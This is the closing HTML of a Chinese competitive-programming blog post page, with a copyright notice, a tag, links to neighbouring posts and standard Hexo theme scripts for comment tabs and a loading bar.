    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-ND</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E6%9E%81%E8%87%B4%E6%AF%92%E7%98%A4/" rel="tag"># 极致毒瘤</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/posts/c6fa5907e5d1119c/" rel="prev" title="「长期更新」 安利">
                  <i class="fa fa-chevron-left"></i> 「长期更新」 安利
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/posts/29332c4b70e33d51/" rel="next" title="CF784G 「BF Calculator」 题解">
                  CF784G 「BF Calculator」 题解 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">MoveToEx</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/local-search.js"></script>













  <script>
    NProgress.configure({
      showSpinner: true
    });
    NProgress.start();
    document.addEventListener('readystatechange', () => {
      if (document.readyState === 'interactive') {
        NProgress.inc(0.8);
      }
      if (document.readyState === 'complete') {
        NProgress.done();
      }
    });
    document.addEventListener('pjax:send', () => {
      NProgress.start();
    });
    document.addEventListener('pjax:success', () => {
      NProgress.done();
    });
  </script><!-- hexo-inject:begin --><!-- hexo-inject:end -->


  








  

  

</body>
</html>
